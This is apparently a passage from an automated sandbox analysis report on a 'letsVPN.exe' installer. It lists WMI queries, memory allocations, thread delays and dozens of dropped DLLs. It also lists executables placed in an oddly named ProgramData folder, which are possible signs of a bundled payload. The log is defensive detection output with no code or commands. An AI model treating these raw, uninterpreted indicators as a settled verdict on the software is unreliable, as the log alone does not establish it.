              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 3000000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2E50000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 29E0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2B20000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 4B20000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2490000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2690000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 4690000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: D70000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2920000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 4920000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: FE0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2A60000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 4A60000 memory reserve | memory write watch
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: memset,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,memcpy,GlobalFree,??3@YAXPAX@Z,17_2_003860A0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Code function: 28_2_00007FF7132A20D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,28_2_00007FF7132A20D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 215098
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8513
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1172
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Window / User API: threadDelayed 3068
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Window / User API: threadDelayed 2941
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Window / User API: threadDelayed 2107
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dll
              Source: C:\Users\user\Desktop\letsVPN.exe Dropped PE file which has not been started: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exe
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsDialogs.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exe
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsExec.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll
              Source: C:\Windows\System32\drvinst.exe Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmp
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe
              Source: C:\Users\user\Desktop\letsVPN.exe Dropped PE file which has not been started: C:\ProgramData\0zVlL\Jd0i4~16\s
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exe
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dll
              Source: C:\ProgramData\letsvpn-latest.exe Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dll
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dll
              Source: C:\Windows\System32\drvinst.exe, Dropped PE file which has not been started: C:\Windows\System32\drivers\SETC543.tmp
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exe
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAE5.tmp
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\System.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dll
              Source: C:\Windows\System32\drvinst.exe, Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dll
